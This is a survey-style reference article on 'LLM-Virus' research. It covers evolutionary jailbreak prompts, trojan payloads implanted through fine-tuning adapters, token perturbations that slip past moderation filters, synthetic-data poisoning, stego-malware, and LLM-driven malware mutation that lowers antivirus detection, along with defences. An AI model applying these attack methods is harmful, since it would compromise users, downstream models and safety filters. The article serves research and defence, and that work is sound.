LLM-Virus: AI-Driven Malware
- LLM-Virus refers to malicious code generated or obfuscated by large language models, spanning text-based, code-based, and polymorphic attacks.
- It employs advanced techniques like evolutionary jailbreaks, malicious fine-tuning, and synthetic data poisoning to maximize stealth and propagation.
- Defensive frameworks integrate anomaly detection, federated learning, and AST-based linting to counter these adaptive, self-mutating threats.
An LLM-Virus refers to any malicious behavior, payload generation, or obfuscation process driven by, assisted by, or directly produced by LLMs. This concept encompasses a broad class of threats, including the use of LLMs for malware creation, variant generation, jailbreak attacks, novel evasion strategies, and even self-propagation or infection mechanisms. LLM-powered viruses span code-based, text-based, and polymorphic attack surfaces, posing distinct challenges and opportunities for defenders and researchers (Al-Karaki et al., 2024).
1. Taxonomy and Variants of LLM-Virus
LLM-Viruses are categorized primarily into three variants (Al-Karaki et al., 2024):
- Text-based threats: Malicious scripts, macros, or adversarial prompts obfuscated within natural-language artifacts such as emails, documents, or social engineering content.
- Code-based payloads: Executable malware whose source code (PowerShell, Python, shellcode, ransomware logic) is synthesized or optimized by LLMs.
- Disguised (polymorphic/metamorphic) malware: Self-mutating code that leverages LLMs for syntactic or structural obfuscation, challenging static/dynamic detection paradigms.
Additionally, specialized sub-categories have emerged:
- Jailbreak-Driven Attacks: Use of evolutionary algorithms or prompt refinement to bypass LLM alignment and induce harmful outputs (Yu et al., 2024).
- Fine-tuning-Enabled Trojans: Malicious behaviors embedded at the weight or training-script level, enabling self-propagating "Trojan" viruses in model checkpoints (Tejedor et al., 4 Apr 2025).
- Vision-LLM (VLM) Evasion: Stego-malware concealed in multimedia, using LLMs for extraction and execution (Noever et al., 9 Jan 2025).
A comprehensive research classification scheme covers harmful content generation, weaponization, malware dissemination, surveys, benchmarking, and novel detection models (Al-Karaki et al., 2024).
2. Construction and Propagation Mechanisms
Multiple construction techniques have been validated:
- Evolutionary Jailbreak (LLM-Virus EA): Treats jailbreak prompt engineering as a genetic optimization process—templates evolve (mutate/crossover) under host LLM safety pressure, seeking high attack success rates, stealthiness, and brevity (Yu et al., 2024). Populations of “viral genomes” are selected and transferred across model families.
- Malicious Fine-Tuning (Trojan Infection): Targets LLM weights via fine-tuning to implant payloads and replication code (e.g., H-Elena). The infection logic is embedded in QLoRA adapters and fine-tuning scripts. Paylods trigger on specific queries, while infection routines propagate through self-generated training scripts (Tejedor et al., 4 Apr 2025).
- Guardrail Bypass (Virus Attack): Designs adversarial samples that evade moderation-based data filtration during fine-tuning—employing token-level perturbations to optimize both stealthiness and harmful gradient similarity (Huang et al., 29 Jan 2025). Leakage ratios up to 100% have been empirically demonstrated.
- Synthetic Data Poisoning (VIA): Uses anchor hijacking and shell-embedding to guarantee that synthetic-data-generated corpora propagate the malicious payload to downstream models, even under clean queries. Optimization prioritizes stealth and maximized infection rate (Liang et al., 27 Sep 2025).
- Multimodal Stego-Malware (VLM-Virus): Appends or obfuscates malware signatures (EICAR file) within images; LLM code-generation agents "uplift" the payload, circumventing traditional file-based controls (Noever et al., 9 Jan 2025).
Propagation pathways include checkpoint distribution, poisoned datasets, trojanized libraries, and adversarial training orchestration. Self-replication triggers are engineered to propagate infection when users reuse training scripts or generate new models from infected ones (Tejedor et al., 4 Apr 2025).
3. Analytical, Detection, and Explanation Applications
LLMs have demonstrated efficacy for both offensive and defensive malware analysis:
- Static Malware Analysis: Prompt-engineered LLMs generate function-level malware explanations with up to 90.9% coverage accuracy (BLEU-4: 0.45, ROUGE-1: 59.9%)—enabling practical support for human analysts (Fujii et al., 2024).
- Dynamic Behavior Summarization: Systems like MaLAware leverage LLMs to ingest, filter, and correlate sandbox events, producing actionable multi-paragraph summaries across file, network, registry, and API channels. Evaluation on open-source LLMs yields ROUGE-1 up to 0.3876 and semantic similarities above 0.75 (Saha et al., 1 Apr 2025).
- Obfuscated Code Deobfuscation: GPT-4 recovers ~70% of URLs and ~90% of domains from obfuscated PowerShell scripts in real-world malware campaigns, outperforming static deobfuscators. Hallucination management remains a challenge for robust pipeline integration (Patsakis et al., 2024).
- Screenshot-Driven IoC Extraction: LLMs parse infection artifacts (screenshots) to extract URLs, filenames, and workflows, allowing automated tracking and clustering of malware campaigns with F1-scores above 0.94 in Indicator-of-Compromise extraction tasks (Ruellan et al., 31 Jul 2025).
4. Evasion, Stealth, and Polymorphism Strategies
LLM-Viruses employ advanced evasion tactics:
- On-device Living-Off-the-Land (LOTL) Attacks: Replace traditional dropper/packer logic with in-memory, dynamically synthesized LLM payloads. No disk touch and prompt-agent polymorphism defeat signature-based and behavioral AV (Oesch et al., 13 Oct 2025).
- Source Code Mutations: LLMalMorph rewrites malware at the function-level via prompt-engineered transformations (obfuscation, optimization, API tactics). Empirical results indicate up to 31.3% reduction in VirusTotal detection and successful ML-based evasion, with human-in-the-loop debugging required for build consistency (Akil et al., 12 Jul 2025).
- Stego-Obfuscation in Multimodal Workspaces: Embedding, splitting, base64 wrapping, and reversal techniques hide payloads in images and other artifacts; LLM code synthesis restores or reconstructs malware, defeating standard filters (Noever et al., 9 Jan 2025).
- Synthetic Data “Shell” Propagation (VIA): By wrapping payloads in anchor-rich shell text, evasion rates rise to 90% infection in synthetic datasets and downstream models despite clean prompting, challenging conventional assumptions about poisoning resilience (Liang et al., 27 Sep 2025).
5. Quantitative Metrics and Results
Representative empirical results from recent studies include:
| Variant/Method | Key Metric | Value/Range | Reference |
|---|---|---|---|
| Static Analysis | Function coverage | 90.9% | (Fujii et al., 2024) |
| Dynamic Summarizer | ROUGE-1, sim. | 0.3876, 0.75+ | (Saha et al., 1 Apr 2025) |
| Jailbreak Attack | ASR (GPT-3.5-Turbo) | 71.8% | (Yu et al., 2024) |
| Guardrail Bypass | Leakage Ratio | 100% | (Huang et al., 29 Jan 2025) |
| Trojan Fine-tune | Infection Prob. | 70–100% | (Tejedor et al., 4 Apr 2025) |
| Synthetic VIA | Infection Rate | 50–90% | (Liang et al., 27 Sep 2025) |
| Screenshot IoC | F1-score (IoC) | > 0.94 | (Ruellan et al., 31 Jul 2025) |
| Variant Generation | VT Δ Detection | –10 to –31% | (Akil et al., 12 Jul 2025) |
Metrics include coverage accuracy, lexical/semantic agreement (BLEU, ROUGE, BERTScore), attack success rate (ASR), leakage ratio, infection probability, F1-score for extraction, and AV/ML evasion rates. Algorithmic definitions employ both cross-entropy minimization, gradient similarity, and convex optimization for stealth and attack efficacy.
6. Defensive Frameworks and Countermeasures
Defensive proposals span multiple layers (Al-Karaki et al., 2024):
- Guiding Principles: Diverse corpora, feature irregularity/anomaly detection, continuous retraining, explainability, performance drift monitoring, and integration with AV/IDS/sandbox systems.
- Operational Controls: Real-time scanning with lightweight LLMs, federated learning for privacy/diversity, adversarial sample training, active learning, continuous threat feed updates.
- Prompt/Output Firewalls: Detect/block known jailbreak/virus prompt patterns, log all prompt-response exchanges for forensic audit (Oesch et al., 13 Oct 2025).
- Anomaly Detection: IOA profiling (e.g., bulk code requests, unusual timing) and spectral/activation signature analysis.
- Static and Dynamic Code Linting: Use AST-based vulnerability scanners, sandbox execution of generated code for behavioral monitoring.
- Model Provenance and Certification: Hashing checkpoint weights, chain-of-thought output inspection, ensemble anomaly detection, and red-teaming against fine-tuning scripts (Tejedor et al., 4 Apr 2025).
- Steganalysis and File Handling: Extend boundary scanning to stego-malware in vision/multimodal inputs, strictly control sandbox file execution and download permissions (Noever et al., 9 Jan 2025).
Mitigation against synthetic-data poisoning emphasizes diversity filtering, adversarial anchor detection, query-agnostic watermarking, and formal robustness certification (Liang et al., 27 Sep 2025).
7. Open Challenges and Directions
Critical unresolved issues identified across studies include:
- Trade-offs between false positives and missed detections, especially in hallucination-prone pipelines (Patsakis et al., 2024).
- Adaptive resilience against fast-evolving, polymorphic LLM-powered malware strains (Akil et al., 12 Jul 2025).
- Scalability and explainability in black-box LLM decisions, requiring novel interpretability and auditing techniques.
- Formal guarantees and certificates of robustness against virus-infection–style propagation in synthetic data models (Liang et al., 27 Sep 2025).
- Generalization to multimodal models and quantum-resilient threat vectors.
- Standardized red-team/baseline benchmarks for LLM-virus efficacy and detection (Al-Karaki et al., 2024).
LLM-Virus research thus spans adversarial construction, evasion, explanation, variant generation, self-propagation, and defense, underpinning new paradigms in both cybersecurity threat modeling and AI deployment risk management. The breadth and technical sophistication of these attacks highlight urgent needs for innovation in both attacker analytics and multi-layered defense.